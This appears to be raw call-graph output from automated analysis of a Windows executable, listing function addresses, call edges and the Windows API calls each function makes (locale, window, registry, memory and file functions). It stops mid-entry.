52967->52968 52969 410928 52968->52969 52969->52906 53295 40ae6c 52970->53295 52974 4128c4 52974->52908 53307 41dd94 8 API calls 52975->53307 53213->52952 53214->52955 53216 408c24 5 API calls 53215->53216 53217 408f9d 53216->53217 53218 408544 GetSystemDefaultLCID 53217->53218 53220 40857a 53218->53220 53219 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53219->53220 53220->53219 53221 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 53220->53221 53222 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53220->53222 53224 4085dc 53220->53224 53221->53220 53222->53220 53223 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53223->53224 53224->53223 53225 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 53224->53225 53226 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53224->53226 53227 40865f 53224->53227 53225->53224 53226->53224 53228 403420 4 API calls 53227->53228 53229 408679 53228->53229 53230 408688 GetSystemDefaultLCID 53229->53230 53287 4084d0 GetLocaleInfoA 53230->53287 53233 403450 4 API calls 53234 4086c8 53233->53234 53235 4084d0 5 API calls 53234->53235 53236 4086dd 53235->53236 53237 4084d0 5 API calls 53236->53237 53238 408701 53237->53238 53293 40851c GetLocaleInfoA 53238->53293 53241 40851c GetLocaleInfoA 53242 408731 53241->53242 53243 4084d0 5 API calls 53242->53243 53244 40874b 53243->53244 53245 40851c GetLocaleInfoA 53244->53245 53246 408768 53245->53246 53247 4084d0 5 API calls 53246->53247 53248 408782 53247->53248 53249 403450 4 API calls 53248->53249 53250 40878f 53249->53250 53251 4084d0 5 API calls 53250->53251 53252 4087a4 53251->53252 53253 403450 4 API calls 53252->53253 53254 4087b1 53253->53254 53255 40851c GetLocaleInfoA 53254->53255 53256 4087bf 53255->53256 53257 4084d0 5 API calls 53256->53257 53258 4087d9 53257->53258 53259 403450 4 API calls 53258->53259 53260 4087e6 53259->53260 53261 4084d0 5 API calls 53260->53261 53262 4087fb 53261->53262 53263 403450 4 API calls 53262->53263 53264 408808 53263->53264 53265 4084d0 5 API calls 53264->53265 53266 40881d 53265->53266 53267 40883a 53266->53267 53268 40882b 53266->53268 53270 403494 4 API calls 53267->53270 53269 403494 4 API calls 53268->53269 53271 408838 53269->53271 53270->53271 53272 4084d0 5 API calls 53271->53272 53273 40885c 53272->53273 53274 408879 53273->53274 53275 40886a 53273->53275 53276 403400 4 API calls 53274->53276 53277 403494 4 API calls 53275->53277 53278 408877 53276->53278 53277->53278 53279 403634 4 API calls 53278->53279 53280 40889b 53279->53280 53281 403634 4 API calls 53280->53281 53282 4088b5 53281->53282 53283 403420 4 API calls 53282->53283 53284 4088cf 53283->53284 53285 408fd8 GetVersionExA 53284->53285 53286 408fef 53285->53286 53286->52965 53288 4084f7 53287->53288 53289 408509 53287->53289 53290 4034e0 4 API calls 53288->53290 53291 403494 4 API calls 53289->53291 53292 408507 53290->53292 53291->53292 53292->53233 53294 408538 53293->53294 53294->53241 53297 40ae73 53295->53297 53296 40ae92 53299 410f7c 53296->53299 53297->53296 53306 40ada4 19 API calls 53297->53306 53300 410f9e 53299->53300 53301 406d54 5 API calls 53300->53301 53302 403450 4 API calls 53300->53302 53303 410fbd 53300->53303 53301->53300 53302->53300 53304 403400 4 API calls 53303->53304 53305 410fd2 53304->53305 53305->52974 53306->53297 54795 440c28 54796 440c31 54795->54796 54797 440c3f WriteFile 54795->54797 54796->54797 54798 440c4a 54797->54798 54799 4135ac SetWindowLongA GetWindowLongA 54800 413609 SetPropA SetPropA 54799->54800 54801 4135eb GetWindowLongA 54799->54801 54805 41f30c 54800->54805 54801->54800 54802 4135fa SetWindowLongA 54801->54802 54802->54800 54810 4151e0 54805->54810 54817 423b7c 54805->54817 54911 4239f4 54805->54911 54806 413659 54811 4151ed 54810->54811 54812 415253 54811->54812 54813 415248 54811->54813 54816 415251 54811->54816 54918 424afc 13 API calls 54812->54918 54813->54816 54919 414fcc 46 API calls 54813->54919 54816->54806 54822 423bb2 54817->54822 54820 423c5c 54823 423c63 54820->54823 54824 423c97 54820->54824 54821 423bfd 54825 423c03 54821->54825 54826 423cc0 54821->54826 54834 423bd3 54822->54834 54920 423ad8 54822->54920 54829 423c69 54823->54829 54869 423f21 54823->54869 54832 423ca2 54824->54832 54833 42400a IsIconic 54824->54833 54830 423c35 54825->54830 54831 423c08 54825->54831 54827 423cd2 54826->54827 54828 423cdb 54826->54828 54835 423ce8 54827->54835 54836 423cd9 54827->54836 54929 424104 11 API calls 54828->54929 54838 423e83 SendMessageA 54829->54838 54839 423c77 54829->54839 54830->54834 54860 423c4e 54830->54860 54861 423daf 54830->54861 54841 423d66 54831->54841 54842 423c0e 54831->54842 54843 424046 54832->54843 54844 423cab 54832->54844 54833->54834 54840 42401e GetFocus 54833->54840 54834->54806 54845 42414c 11 API calls 54835->54845 54930 423af4 NtdllDefWindowProc_A 54836->54930 54838->54834 54839->54834 54870 423c30 54839->54870 54890 423ec6 54839->54890 54840->54834 54846 42402f 54840->54846 54934 423af4 NtdllDefWindowProc_A 54841->54934 54847 423c17 54842->54847 54848 423d8e PostMessageA 54842->54848 54949 4247c0 WinHelpA PostMessageA 54843->54949 54851 42405d 54844->54851 54844->54870 54845->54834 54948 41ef64 GetCurrentThreadId 73A15940 54846->54948 54855 423c20 54847->54855 54856 423e15 54847->54856 54935 423af4 NtdllDefWindowProc_A 54848->54935 54858 424066 54851->54858 54859 42407b 54851->54859 54864 423c29 54855->54864 54865 423d3e IsIconic 54855->54865 54866 423e1e 54856->54866 54867 423e4f 54856->54867 54857 423da9 54857->54834 54868 424444 5 API calls 54858->54868 54950 42449c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 54859->54950 54860->54870 54871 423d7b 54860->54871 54924 423af4 NtdllDefWindowProc_A 54861->54924 54863 424036 54863->54834 54875 42403e SetFocus 54863->54875 54864->54870 54876 423d01 54864->54876 54878 423d5a 54865->54878 54879 423d4e 54865->54879 54937 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 54866->54937 54925 423af4 NtdllDefWindowProc_A 54867->54925 54868->54834 54869->54834 54885 423f47 IsWindowEnabled 54869->54885 54870->54834 54928 423af4 NtdllDefWindowProc_A 54870->54928 54873 4240e8 12 API calls 54871->54873 54873->54834 54874 423db5 54882 423df3 54874->54882 54883 423dd1 54874->54883 54875->54834 54876->54834 54931 422bbc ShowWindow PostMessageA PostQuitMessage 54876->54931 54933 423af4 NtdllDefWindowProc_A 54878->54933 54932 423b30 15 API calls 54879->54932 54891 4239f4 6 API calls 54882->54891 54936 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 54883->54936 54884 423e26 54893 423e38 54884->54893 54938 41eec8 54884->54938 54885->54834 54894 423f55 54885->54894 54888 423e55 54895 423e6d 54888->54895 54926 41ee14 GetCurrentThreadId 73A15940 54888->54926 54890->54834 54897 423ee8 IsWindowEnabled 54890->54897 54898 423dfb PostMessageA 54891->54898 54944 423af4 NtdllDefWindowProc_A 54893->54944 54904 423f5c IsWindowVisible 54894->54904 54902 4239f4 6 API calls 54895->54902 54896 423dd9 PostMessageA 54896->54834 54897->54834 54903 423ef6 54897->54903 54898->54834 54902->54834 54945 412280 7 API calls 54903->54945 54904->54834 54906 423f6a GetFocus 54904->54906 54907 418150 54906->54907 54908 423f7f SetFocus 54907->54908 54946 4151b0 54908->54946 54912 423a7d 54911->54912 54913 423a04 54911->54913 54912->54806 54913->54912 54914 423a0a EnumWindows 54913->54914 54914->54912 54915 423a26 GetWindow GetWindowLongA 54914->54915 54951 42398c GetWindow 54914->54951 54916 423a45 54915->54916 54916->54912 54917 423a71 SetWindowPos 54916->54917 54917->54912 54917->54916 54918->54816 54919->54816 54921 423ae2 54920->54921 54922 423aed 54920->54922 54921->54922 54923 408688 7 API calls 54921->54923 54922->54820 54922->54821 54923->54922 54924->54874 54925->54888 54927 41ee99 54926->54927 54927->54895 54928->54834 54929->54834 54930->54834 54931->54834 54932->54834 54933->54834 54934->54834 54935->54857 54936->54896 54937->54884 54939 41eed0 IsWindow 54938->54939 54940 41eefc 54938->54940 54941 41eeea 54939->54941 54942 41eedf EnableWindow 54939->54942 54940->54893 54941->54939 54941->54940 54943 402660 4 API calls 54941->54943 54942->54941 54943->54941 54944->54834 54945->54834 54947 4151cb SetFocus 54946->54947 54947->54834 54948->54863 54949->54857 54950->54857 54952 4239ad GetWindowLongA 54951->54952 54953 4239b9 54951->54953 54952->54953 54954 22e1100 54955 22e1109 54954->54955 54957 22e1112 54954->54957 54958 22e1119 54957->54958 54959 22e1e90 54957->54959 54963 22e1eae 54959->54963 54961 22e41e8 54974 22e44f0 RaiseException 54961->54974 54964 22e2265 54963->54964 54965 22e20b9 54963->54965 54967 45bbf8 54963->54967 54964->54965 54973 22e44f0 RaiseException 54964->54973 54965->54957 54968 45bc07 54967->54968 54969 45bc3b VirtualAlloc 54968->54969 54975 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54968->54975 54971 45bc53 54969->54971 54971->54964 54972 45bc36 54972->54969 54973->54961 54974->54965 54975->54972 54976 416ab2 54977 416b5a 54976->54977 54978 416aca 54976->54978 54995 41528c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54977->54995 54979 416ae4 SendMessageA 54978->54979 54980 416ad8 54978->54980 54991 416b38 54979->54991 54982 416ae2 CallWindowProcA 54980->54982 54983 416afe 54980->54983 54982->54991 54992 419fc8 GetSysColor 54983->54992 54986 416b09 SetTextColor 54987 416b1e 54986->54987 54993 419fc8 GetSysColor 54987->54993 54989 416b23 SetBkColor 54994 41a650 GetSysColor CreateBrushIndirect 54989->54994 54992->54986 54993->54989 54994->54991 54995->54991 54996 4165b4 54997 4165c1 54996->54997 54998 41661b 54996->54998 55003 4164c0 CreateWindowExA 54997->55003 54999 4165c8 SetPropA SetPropA 54999->54998 55000 4165fb 54999->55000 55001 41660e SetWindowPos 55000->55001 55001->54998 55003->54999 55004 4678f0 55005 467926 55004->55005 55038 467b13 55004->55038 55007 46795a 55005->55007 55010 4679a4 55005->55010 55011 4679b5 55005->55011 55012 467982 55005->55012 55013 467993 55005->55013 55014 467971 55005->55014 55006 403400 4 API calls 55009 467b9f 55006->55009 55008 465094 19 API calls 55007->55008 55007->55038 55022 4679d7 55008->55022 55019 403400 4 API calls 55009->55019 55216 467660 61 API calls 55010->55216 55217 467880 40 API calls 55011->55217 55215 467344 37 API calls 55012->55215 55059 46748c 55013->55059 55039 4671dc 55014->55039 55021 467ba7 55019->55021 55023 48eca0 18 API calls 55022->55023 55030 467a19 55022->55030 55022->55038 55023->55030 55024 464fd0 19 API calls 55024->55030 55025 467b00 55218 47d880 97 API calls 55025->55218 55026 414a58 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55026->55030 55027 42ca9c 6 API calls 55027->55030 55029 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55029->55030 55030->55024 55030->55025 55030->55026 55030->55027 55030->55029 55033 466bec 23 API calls 55030->55033 55035 467b81 55030->55035 55030->55038 55100 466b18 55030->55100 55107 466320 55030->55107 55144 47d43c 55030->55144 55219 466fb8 19 API calls 55030->55219 55033->55030 55036 466bec 23 API calls 55035->55036 55036->55038 55038->55006 55040 414a58 4 API calls 55039->55040 55041 46720e 55040->55041 55044 48eca0 18 API calls 55041->55044 55049 46724f 55041->55049 55042 467255 55045 467277 55042->55045 55050 468ec0 21 API calls 55042->55050 55043 46728c 55046 4672c1 55043->55046 55047 467298 GetCursor LoadCursorA SetCursor Sleep SetCursor 55043->55047 55044->55049 55051 414a88 4 API calls 55045->55051 55220 4795d4 37 API calls 55046->55220 55047->55046 55049->55042 55049->55043 55053 46726a 55050->55053 55054 46728a 55051->55054 55052 4672d5 55052->55054 55056 414a88 4 API calls 55052->55056 55055 403450 4 API calls 55053->55055 55057 403400 4 API calls 55054->55057 55055->55045 55056->55054 55058 46731a 55057->55058 55058->55007 55221 467f90 55059->55221 55062 467624 55063 403400 4 API calls 55062->55063 55065 467639 55063->55065 55064 414a58 4 API calls 55066 4674da 55064->55066 55067 403420 4 API calls 55065->55067 55068 4674e7 55066->55068 55069 467615 55066->55069 55071 467646 55067->55071 55072 42c7a8 5 API calls 55068->55072 55070 403450 4 API calls 55069->55070 55070->55062 55073 403400 4 API calls 55071->55073 55074 4674f6 55072->55074 55076 46764e 55073->55076 55075 42c36c 5 API calls 55074->55075 55077 467501 55075->55077 55076->55007 55224 454574 13 API calls 55077->55224 55079 467573 55079->55062 55080 4675d3 55079->55080 55081 42cc24 7 API calls 55079->55081 55080->55062 55080->55069 55085 42cc24 7 API calls 55080->55085 55082 4675ac 55081->55082 55082->55080 55087 4508e0 4 API calls 55082->55087 55083 46750e 55083->55079 55084 462aac 19 API calls 55083->55084 55088 46753d 55084->55088 55086 4675e9 55085->55086 55086->55069 55091 4508e0 4 API calls 55086->55091 55089 4675c3 55087->55089 55090 462aac 19 API calls 55088->55090 55226 4795d4 37 API calls 55089->55226 55093 46754e 55090->55093 55094 467600 55091->55094 55095 4508b0 4 API calls 55093->55095 55227 4795d4 37 API calls 55094->55227 55097 467563 55095->55097 55225 4795d4 37 API calls 55097->55225 55098 467610 55098->55062 55098->55069 55101 466b24 55100->55101 55102 466b29 55100->55102 55103 466b27 55101->55103 55334 466584 55101->55334 55419 465ea0 45 API calls 55102->55419 55103->55030 55105 466b31 55105->55030 55108 466353 55107->55108 55435 478628 55108->55435 55110 466368 55111 46638f 55110->55111 55112 46636c 55110->55112 55113 466386 55111->55113 55452 48eba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55111->55452 55114 462cac 20 API calls 55112->55114 55117 403494 4 API calls 55113->55117 55143 4664b9 55113->55143 55116 466376 55114->55116 55120 403450 4 API calls 55116->55120 55121 466462 55117->55121 55118 403400 4 API calls 55122 4664ee 55118->55122 55119 4663ab 55119->55113 55123 4663b3 55119->55123 55120->55113 55124 40357c 4 API calls 55121->55124 55122->55030 55125 466bec 23 API calls 55123->55125 55126 46646f 55124->55126 55127 4663c0 55125->55127 55128 40357c 4 API calls 55126->55128 55453 42ed94 55127->55453 55130 46647c 55128->55130 55132 40357c 4 API calls 55130->55132 55134 466489 55132->55134 55136 40357c 4 API calls 55134->55136 55135 466402 55137 403450 4 API calls 55135->55137 55138 466497 55136->55138 55139 466412 55137->55139 55140 414a88 4 API calls 55138->55140 55139->55030 55141 4664a8 55140->55141 55142 462fe4 11 API calls 55141->55142 55142->55143 55143->55118 55145 467f90 42 API calls 55144->55145 55146 47d47f 55145->55146 55147 47d488 55146->55147 55675 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55146->55675 55149 414a58 4 API calls 55147->55149 55150 47d498 55149->55150 55151 403450 4 API calls 55150->55151 55152 47d4a5 55151->55152 55502 4682a0 55152->55502 55155 47d4b5 55157 414a58 4 API calls 55155->55157 55158 47d4c5 55157->55158 55159 403450 4 API calls 55158->55159 55160 47d4d2 55159->55160 55161 465c88 SendMessageA 55160->55161 55162 47d4eb 55161->55162 55163 47d529 55162->55163 55677 474c9c 23 API calls 55162->55677 55165 42414c 11 API calls 55163->55165 55166 47d533 55165->55166 55167 47d544 SetActiveWindow 55166->55167 55168 47d559 55166->55168 55167->55168 55531 47ca40 55168->55531 55215->55007 55216->55007 55217->55007 55218->55038 55219->55030 55220->55052 55228 46801c 55221->55228 55224->55083 55225->55079 55226->55080 55227->55098 55229 414a58 4 API calls 55228->55229 55230 46804e 55229->55230 55282 462d44 55230->55282 55233 414a88 4 API calls 55234 468060 55233->55234 55235 46806f 55234->55235 55237 468088 55234->55237 55311 4795d4 37 API calls 55235->55311 55239 4680cf 55237->55239 55241 4680b6 55237->55241 55238 403420 4 API calls 55240 4674be 55238->55240 55242 468134 55239->55242 55255 4680d3 55239->55255 55240->55062 55240->55064 55312 4795d4 37 API calls 55241->55312 55314 42ca28 CharNextA 55242->55314 55245 468143 55246 468147 55245->55246 55251 468160 55245->55251 55315 4795d4 37 API calls 55246->55315 55248 46811b 55313 4795d4 37 API calls 55248->55313 55250 468184 55316 4795d4 37 API calls 55250->55316 55251->55250 55291 462eb4 55251->55291 55255->55248 55255->55251 55258 46819d 55259 403778 4 API calls 55258->55259 55260 4681b3 55259->55260 55299 42c878 55260->55299 55263 4681c4 55317 462f40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55263->55317 55264 4681f2 55265 42c7a8 5 API calls 55264->55265 55267 4681fd 55265->55267 55269 42c36c 5 API calls 55267->55269 55268 4681d7 55270 4508e0 4 API calls 55268->55270 55272 468208 55269->55272 55271 4681e4 55270->55271 55318 4795d4 37 API calls 55271->55318 55274 42ca9c 6 API calls 55272->55274 55276 468213 55274->55276 55275 468083 55275->55238 55303 467fb0 55276->55303 55278 46821b 55279 42cc24 7 API calls 55278->55279 55280 468223 55279->55280 55280->55275 55319 4795d4 37 API calls 55280->55319 55287 462d5e 55282->55287 55284 42ca9c 6 API calls 55284->55287 55285 403450 4 API calls 55285->55287 55286 406b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55286->55287 55287->55284 55287->55285 55287->55286 55288 462da7 55287->55288 55320 42c988 55287->55320 55289 403420 4 API calls 55288->55289 55290 462dc1 55289->55290 55290->55233 55292 462ebe 55291->55292 55293 462ed1 55292->55293 55331 42ca18 CharNextA 55292->55331 55293->55250 55295 462ee4 55293->55295 55296 462eee 55295->55296 55297 462f1b 55296->55297 55332 42ca18 CharNextA 55296->55332 55297->55250 55297->55258 55300 42c8d1 55299->55300 55301 42c88e 55299->55301 55300->55263 55300->55264 55301->55300 55333 42ca18 CharNextA 55301->55333 55304 468015 55303->55304 55305 467fc3 55303->55305 55304->55278 55305->55304 55306 41ee14 2 API calls 55305->55306 55307 467fd3 55306->55307 55308 467fed SHPathPrepareForWriteA 55307->55308 55309 41eec8 6 API calls 55308->55309 55310 46800d 55309->55310 55310->55278 55311->55275 55312->55275 55313->55275 55314->55245 55315->55275 55316->55275 55317->55268 55318->55275 55319->55275 55321 403494 4 API calls 55320->55321 55322 42c998 55321->55322 55323 403744 4 API calls 55322->55323 55326 42c9ce 55322->55326 55329 42c3b4 IsDBCSLeadByte 55322->55329 55323->55322 55325 42ca12 55325->55287 55326->55325 55328 4037b8 4 API calls 55326->55328 55330 42c3b4 IsDBCSLeadByte 55326->55330 55328->55326 55329->55322 55330->55326 55331->55292 55332->55296 55333->55301 55336 4665cb 55334->55336 55335 466a43 55337 466a5e 55335->55337 55338 466a8f 55335->55338 55336->55335 55339 466686 55336->55339 55343 403494 4 API calls 55336->55343 55342 403494 4 API calls 55337->55342 55340 403494 4 API calls 55338->55340 55341 4666a7 55339->55341 55345 4666e8 55339->55345 55344 466a9d 55340->55344 55346 403494 4 API calls 55341->55346 55347 466a6c 55342->55347 55348 46660a 55343->55348 55432 46557c 12 API calls 55344->55432 55349 403400 4 API calls 55345->55349 55351 4666b5 55346->55351 55431 46557c 12 API calls 55347->55431 55353 414a58 4 API calls 55348->55353 55354 4666e6 55349->55354 55355 414a58 4 API calls 55351->55355 55357 46662b 55353->55357 55363 4667cc 55354->55363 55420 465c88 55354->55420 55359 4666d6 55355->55359 55356 466a7a 55358 403400 4 API calls 55356->55358 55360 403634 4 API calls 55357->55360 55362 466ac0 55358->55362 55365 403634 4 API calls 55359->55365 55366 46663b 55360->55366 55369 403400 4 API calls 55362->55369 55364 466854 55363->55364 55382 466813 55363->55382 55367 403400 4 API calls 55364->55367 55365->55354 55370 414a58 4 API calls 55366->55370 55375 466852 55367->55375 55368 466708 55371 466746 55368->55371 55372 46670e 55368->55372 55373 466ac8 55369->55373 55374 46664f 55370->55374 55378 403400 4 API calls 55371->55378 55376 403494 4 API calls 55372->55376 55377 403420 4 API calls 55373->55377 55374->55339 55379 414a58 4 API calls 55374->55379 55426 4660c4 42 API calls 55375->55426 55380 46671c 55376->55380 55381 466ad5 55377->55381 55383 466744 55378->55383 55384 466676 55379->55384 55386 476f14 42 API calls 55380->55386 55381->55103 55387 403494 4 API calls 55382->55387 55392 465f7c 42 API calls 55383->55392 55388 403634 4 API calls 55384->55388 55390 466734 55386->55390 55391 466821 55387->55391 55388->55339 55389 46687d 55398 4668de 55389->55398 55399 466888 55389->55399 55393 403634 4 API calls 55390->55393 55394 414a58 4 API calls 55391->55394 55395 46676d 55392->55395 55393->55383 55396 466842 55394->55396 55402 4667ce 55395->55402 55403 466778 55395->55403 55397 403634 4 API calls 55396->55397 55397->55375 55400 403400 4 API calls 55398->55400 55401 403494 4 API calls 55399->55401 55404 4668e6 55400->55404 55408 466896 55401->55408 55405 403400 4 API calls 55402->55405 55406 403494 4 API calls 55403->55406 55407 4668dc 55404->55407 55418 46698f 55404->55418 55405->55363 55411 466786 55406->55411 55407->55404 55427 48eba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55407->55427 55408->55404 55408->55407 55413 403634 4 API calls 55408->55413 55410 466909 55410->55418 55428 48ee0c 18 API calls 55410->55428 55411->55363 55414 403634 4 API calls 55411->55414 55413->55408 55414->55411 55416 466a30 55430 4290b4 SendMessageA SendMessageA 55416->55430 55429 429064 SendMessageA 55418->55429 55419->55105 55433 429fb0 SendMessageA 55420->55433 55422 465c97 55423 465cb7 55422->55423 55434 429fb0 SendMessageA 55422->55434 55423->55368 55425 465ca7 55425->55368 55426->55389 55427->55410 55428->55418 55429->55416 55430->55335 55431->55356 55432->55356 55433->55422 55434->55425 55436 478656 55435->55436 55440 47868c 55435->55440 55470 454474 55436->55470 55437 403420 4 API calls 55438 47878d 55437->55438 55438->55110 55440->55437 55441 478680 55441->55440 55442 478756 55441->55442 55443 474518 19 API calls 55441->55443 55444 476f14 42 API calls 55441->55444 55450 478704 55441->55450 55477 4781e8 31 API calls 55441->55477 55442->55110 55443->55441 55444->55441 55445 476f14 42 API calls 55445->55450 55447 42c808 5 API calls 55447->55450 55448 42c830 5 API calls 55448->55450 55450->55441 55450->55445 55450->55447 55450->55448 55451 478743 55450->55451 55478 478334 54 API calls 55450->55478 55451->55440 55452->55119 55454 42eda0 55453->55454 55455 42edc3 GetActiveWindow GetFocus 55454->55455 55456 41ee14 2 API calls 55455->55456 55457 42edda 55456->55457 55458 42edf7 55457->55458 55459 42ede7 RegisterClassA 55457->55459 55460 42ee86 SetFocus 55458->55460 55461 42ee05 CreateWindowExA 55458->55461 55459->55458 55462 403400 4 API calls 55460->55462 55461->55460 55463 42ee38 55461->55463 55464 42eea2 55462->55464 55496 4241ec 55463->55496 55469 48ee0c 18 API calls 55464->55469 55466 42ee60 55467 42ee68 CreateWindowExA 55466->55467 55467->55460 55468 42ee7e ShowWindow 55467->55468 55468->55460 55469->55135 55471 454485 55470->55471 55472 454492 55471->55472 55473 454489 55471->55473 55487 454258 29 API calls 55472->55487 55479 454178 55473->55479 55476 45448f 55476->55441 55477->55441 55478->55450 55480 42dc54 RegOpenKeyExA 55479->55480 55481 454195 55480->55481 55482 4541e3 55481->55482 55488 4540ac 55481->55488 55482->55476 55485 4540ac 6 API calls 55486 4541c4 RegCloseKey 55485->55486 55486->55476 55487->55476 55493 42db90 55488->55493 55490 403420 4 API calls 55491 45415e 55490->55491 55491->55485 55492 4540d4 55492->55490 55494 42da38 6 API calls 55493->55494 55495 42db99 55494->55495 55495->55492 55497 42421e 55496->55497 55498 4241fe GetWindowTextA 55496->55498 55500 403494 4 API calls 55497->55500 55499 4034e0 4 API calls 55498->55499 55501 42421c 55499->55501 55500->55501 55501->55466 55503 4682c9 55502->55503 55504 414a58 4 API calls 55503->55504 55514 468316 55503->55514 55505 4682df 55504->55505 55683 462dd0 6 API calls 55505->55683 55506 403420 4 API calls 55508 4683c0 55506->55508 55508->55155 55676 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55508->55676 55509 4682e7 55510 414a88 4 API calls 55509->55510 55511 4682f5 55510->55511 55512 468302 55511->55512 55515 46831b 55511->55515 55684 4795d4 37 API calls 55512->55684 55514->55506 55516 468333 55515->55516 55518 462eb4 CharNextA 55515->55518 55685 4795d4 37 API calls 55516->55685 55519 46832f 55518->55519 55519->55516 55520 468349 55519->55520 55521 468365 55520->55521 55522 46834f 55520->55522 55524 42c878 CharNextA 55521->55524 55686 4795d4 37 API calls 55522->55686 55525 468372 55524->55525 55525->55514 55687 462f40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55525->55687 55527 468389 55528 4508e0 4 API calls 55527->55528 55529 468396 55528->55529 55688 4795d4 37 API calls 55529->55688 55532 47ca91 55531->55532 55533 47ca63 55531->55533 55535 47123c 55532->55535 55689 48ebc0 18 API calls 55533->55689 55536 455bc8 24 API calls 55535->55536 55537 471288 55536->55537 55538 407210 SetCurrentDirectoryA 55537->55538 55539 471292 55538->55539 55690 469db0 55539->55690 55544 476f14 42 API calls 55545 4712ee 55544->55545 55547 4712fe 55545->55547 56093 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55545->56093 55548 471320 55547->55548 56094 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55547->56094 55550 473d54 20 API calls 55548->55550 55551 47132b 55550->55551 55552 403450 4 API calls 55551->55552 55553 471348 55552->55553 55554 403450 4 API calls 55553->55554 55555 471356 55554->55555 55700 46a398 55555->55700 55677->55163 55683->55509 55684->55514 55685->55514 55686->55514 55687->55527 55688->55514 55689->55532 55692 469dd7 55690->55692 55691 469e54 56101 44f280 55691->56101 55692->55691 55693 474518 19 API calls 55692->55693 55693->55692 55696 45849c 55697 4584a2 55696->55697 55698 458784 4 API calls 55697->55698 55699 4584be 55698->55699 55699->55544 55701 46a3d6 55700->55701 55702 46a3c6 55700->55702 55704 403400 4 API calls 55701->55704 55703 403494 4 API calls 55702->55703 55705 46a3d4 55703->55705 55704->55705 55706 453cc8 5 API calls 55705->55706 55707 46a3ea 55706->55707 55708 453d04 5 API calls 55707->55708 55709 46a3f8 55708->55709 55710 46a370 5 API calls 55709->55710 55711 46a40c 55710->55711 55712 458558 4 API calls 55711->55712 55713 46a424 55712->55713 55714 403420 4 API calls 55713->55714 55715 46a43e 55714->55715 55716 403400 4 API calls 55715->55716 55717 46a446 55716->55717 55718 46a5a4 55717->55718 55719 4034e0 4 API calls 55718->55719 55720 46a5e1 55719->55720 55721 46a5ea 55720->55721 55722 46a5f9 55720->55722 55724 476f14 42 API calls 55721->55724 55723 403400 4 API calls 55722->55723 55725 46a5f7 55723->55725 55724->55725 55726 476f14 42 API calls 55725->55726 55727 46a61c 55726->55727 55728 46a64b 55727->55728 56113 46a458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55727->56113 56110 46a590 55728->56110 55732 476f14 42 API calls 55733 46a68c 55732->55733 55734 458558 4 API calls 55733->55734 55735 46a6aa 55734->55735 55736 403420 4 API calls 55735->55736 55737 46a6c4 55736->55737 55738 403420 4 API calls 55737->55738 56093->55547 56094->55548 56104 44f294 56101->56104 56105 44f2a5 56104->56105 56106 44f2c6 MulDiv 56105->56106 56107 44f291 56105->56107 56108 418150 56106->56108 56107->55696 56109 44f2f1 SendMessageA 56108->56109 56109->56107 56111 403494 4 API calls 56110->56111 56112 46a59f 56111->56112 56112->55732 56113->55728 57137 435174 57138 435189 57137->57138 57139 4351a3 57138->57139 57143 434b5c 57138->57143 57148 434ba6 57143->57148 57149 434b8c 57143->57149 57144 403400 4 API calls 57145 434fab 57144->57145 57145->57139 57156 434fbc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57145->57156 57146 446638 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57146->57149 57147 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57147->57149 57148->57144 57149->57146 57149->57147 57149->57148 57150 402648 4 API calls 57149->57150 57152 431534 4 API calls 57149->57152 57153 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57153 57154 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57154 57157 433c44 57149->57157 57169 434408 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57149->57169 57150->57149 57152->57149 57153->57149 57154->57149 57156->57139 57158 433d01 57157->57158 57159 433c71 57157->57159 57188 433ba4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57158->57188 57160 403494 4 API calls 57159->57160 57162 433c7f 57160->57162 57164 403778 4 API calls 57162->57164 57163 403400 4 API calls 57165 433d51 57163->57165 57167 433ca0 57164->57167 57165->57149 57166 433cf3 57166->57163 57167->57166 57170 48e858 57167->57170 57169->57149 57171 48e928 57170->57171 57172 48e890 57170->57172 57189 4481c4 57171->57189 57173 403494 4 API calls 57172->57173 57175 48e89b 57173->57175 57176 48e8ab 57175->57176 57179 4037b8 4 API calls 57175->57179 57177 403400 4 API calls 57176->57177 57178 48e94c 57177->57178 57180 403400 4 API calls 57178->57180 57182 48e8c4 57179->57182 57181 48e954 57180->57181 57181->57167 57182->57176 57183 4037b8 4 API calls 57182->57183 57184 48e8e7 57183->57184 57185 403778 4 API calls 57184->57185 57186 48e918 57185->57186 57187 403634 4 API calls 57186->57187 57187->57171 57188->57166 57190 4481e9 57189->57190 57200 44822c 57189->57200 57191 403494 4 API calls 57190->57191 57193 4481f4 57191->57193 57192 448240 57195 403400 4 API calls 57192->57195 57197 4037b8 4 API calls 57193->57197 57196 448273 57195->57196 57196->57176 57198 448210 57197->57198 57199 4037b8 4 API calls 57198->57199 57199->57200 57200->57192 57201 447dc0 57200->57201 57202 403494 4 API calls 57201->57202 57203 447df6 57202->57203 57204 4037b8 4 API calls 57203->57204 57205 447e08 57204->57205 57206 403778 